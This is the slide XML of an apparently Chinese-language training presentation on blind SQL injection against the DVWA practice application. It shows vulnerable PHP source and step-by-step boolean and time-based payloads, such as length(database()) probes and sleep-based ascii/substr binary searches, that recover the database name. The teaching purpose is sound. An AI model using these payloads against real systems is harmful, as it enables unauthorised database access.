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3" r:id="rId2"/>
    <p:sldId id="456" r:id="rId3"/>
    <p:sldId id="460" r:id="rId4"/>
    <p:sldId id="461" r:id="rId5"/>
    <p:sldId id="462" r:id="rId6"/>
    <p:sldId id="464" r:id="rId7"/>
    <p:sldId id="458" r:id="rId8"/>
    <p:sldId id="457" r:id="rId9"/>
    <p:sldId id="465" r:id="rId10"/>
    <p:sldId id="466" r:id="rId11"/>
    <p:sldId id="459" r:id="rId12"/>
    <p:sldId id="467" r:id="rId13"/>
    <p:sldId id="468" r:id="rId14"/>
    <p:sldId id="4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31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4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0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9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4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126D-88E9-4BE5-8430-5E72CFCBDAA8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9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42875" y="-57150"/>
            <a:ext cx="92868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SQL Injection (Blind)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0"/>
              <a:t>漏洞實務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.freebuf.com/articles/web/120985.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19080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117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DEMO:: SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p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219481" y="655935"/>
            <a:ext cx="292451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2" y="1362299"/>
            <a:ext cx="7112945" cy="5012744"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19466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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="103530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DEMO::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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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SQL Injection (Blind) Source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369744" y="1863110"/>
            <a:ext cx="8404512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if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $_SESSION [ 'id' ] ) ) { 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    // Get input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $id = $_SESSION[ 'id' ];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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Check database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $query  = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = '$id' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"], $query ) or die( '&lt;pre&gt;Something went wrong.&lt;/pre&gt;' );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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Get results </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    while( $row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $result ) ) { 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        // Get values </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        $first = $row["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        $last  = $row["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?&gt;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02256" y="4638421"/>
            <a:ext cx="4572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SQL查詢語句中增加了LIMIT 1，達到控制只輸出一個結果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13870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873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DEMO:: SQL Injection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597042" y="1781365"/>
            <a:ext cx="79499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first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = '$id' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT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4955957" y="2286118"/>
            <a:ext cx="476518" cy="7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096259" y="2150697"/>
            <a:ext cx="141668" cy="30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00215" y="2542312"/>
            <a:ext cx="26084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LIMIT 1可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>#註解繞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>過</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597042" y="3282833"/>
            <a:ext cx="79499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first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r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smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>LIMIT 1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4928410" y="3804620"/>
            <a:ext cx="476518" cy="7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15910" y="4784301"/>
            <a:ext cx="8892711" cy="353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700" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' and length(database())=4 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" dirty="0"/>
              <a:t>LIMIT 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="向下箭號 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4928410" y="5323122"/>
            <a:ext cx="476518" cy="7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7730" y="6344490"/>
            <a:ext cx="87962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first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = '1' and length(database())=4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7730" y="5877121"/>
            <a:ext cx="239039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最終SQL語法就會成為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025425" y="5245736"/>
            <a:ext cx="141668" cy="30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78932" y="5586722"/>
            <a:ext cx="13179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/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> injection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0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79" y="1864260"/>
            <a:ext cx="6675955" cy="4691995"/>
          </a:xfr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873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DEMO:: SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279044" y="1278955"/>
            <a:ext cx="241476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909474" y="3673858"/>
            <a:ext cx="276160" cy="692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27" y="1995496"/>
            <a:ext cx="7210957" cy="4727275"/>
          </a:xfr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8732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DEMO:: SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279044" y="1278955"/>
            <a:ext cx="241476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DVWA_1.10_high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8238" y="4110927"/>
            <a:ext cx="29430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1' and length(database())=4 #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10851"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="850006" y="1414699"/>
            <a:ext cx="7713024" cy="52050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9747" y="5055600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11177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" y="3871820"/>
            <a:ext cx="4210642" cy="23018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7" t="21606"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="265528" y="1378376"/>
            <a:ext cx="4030167" cy="23178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1" t="23767"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1397526"/>
            <a:ext cx="4503794" cy="2279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7" t="19022" r="1037" b="12431"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826527" y="3785248"/>
            <a:ext cx="4317473" cy="23883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43130" y="6088436"/>
            <a:ext cx="242887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只會回傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500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10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6158490" y="4979442"/>
            <a:ext cx="13308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and 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6158490" y="2362215"/>
            <a:ext cx="133081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and 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7109392" y="3101191"/>
            <a:ext cx="41549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13643" y="5719104"/>
            <a:ext cx="41549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3947083"/>
            <a:ext cx="4419600" cy="1447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7636461" y="5831271"/>
            <a:ext cx="54373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710668"/>
            <a:ext cx="4400550" cy="1447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948134"/>
            <a:ext cx="4391025" cy="14287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2" y="5165499"/>
            <a:ext cx="4362450" cy="1447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0500" y="1266649"/>
            <a:ext cx="27238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猜測當前資料庫字串長度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4462303" y="2481706"/>
            <a:ext cx="29430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and length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 #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62303" y="3662509"/>
            <a:ext cx="29430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and length(database())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> #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85202" y="4766369"/>
            <a:ext cx="29430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and length(database())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> #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85202" y="5908215"/>
            <a:ext cx="29430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1' and length(database())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> #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11840" y="4689425"/>
            <a:ext cx="54373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dirty="0" smtClean="0"/>
              <a:t>否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7657128" y="3585565"/>
            <a:ext cx="54373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smtClean="0"/>
              <a:t>否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7666608" y="2434568"/>
            <a:ext cx="54373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dirty="0" smtClean="0"/>
              <a:t>否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6864304" y="6428633"/>
            <a:ext cx="21483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資料庫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>名稱長度為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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65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272928"/>
            <a:ext cx="63161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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二分法 結合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Time-based blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>猜測資料庫名稱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="「ascii tabl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9" t="9165" r="5258" b="18214"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7053866" y="1457594"/>
            <a:ext cx="2090134" cy="51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245"/>
            <a:ext cx="6943725" cy="3400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6840" y="4782552"/>
            <a:ext cx="65468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1' and if(ascii(substr(database(),1,1))&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>97</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>明顯延遲</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>1' and if(ascii(substr(database(),1,1))&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>1' and if(ascii(substr(database(),1,1))&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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5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5772" y="1462683"/>
            <a:ext cx="63161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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二分法 結合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Time-based blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>猜測資料庫名稱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169495"/>
            <a:ext cx="8153400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' and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(database(),1,1))&gt;97,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>明顯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>延遲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(database(),1,1))&gt;100,sleep(5),1)#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(database(),1,1))&lt;100,sleep(5),1)#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endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1' and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(database(),2,2))&gt;110,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>明顯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>延遲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(database(),2,2))&gt;118,sleep(5),1)#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(database(),2,2))&lt;118,sleep(5),1)#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endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1' and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(database(),3,3))&gt;75,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>明顯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>延遲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(database(),3,3))&gt;77,sleep(5),1)#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(database(),3,3))&lt;77,sleep(5),1)#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endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1' and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(database(),4,4))&gt;95,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>明顯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>延遲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(database(),4,4))&gt;97,sleep(5),1)#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1' and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ascii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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(database(),4,4))&lt;97,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>沒有延遲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6316153" y="2589812"/>
            <a:ext cx="3738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d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316153" y="3537364"/>
            <a:ext cx="34657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 smtClean="0"/>
              <a:t>v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259131" y="4715478"/>
            <a:ext cx="42898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/>
              <a:t>w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306535" y="5844148"/>
            <a:ext cx="35618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30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0" y="181942"/>
            <a:ext cx="9144000" cy="13071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DEMO::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en-US" altLang="zh-TW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SQL Injection (Blind) Source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369744" y="1863110"/>
            <a:ext cx="8658346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if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $_POST[ 'Submit' ]  ) ) { </a:t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>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  // Get input 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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $id = $_POST[ 'id' ]; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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$id = ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
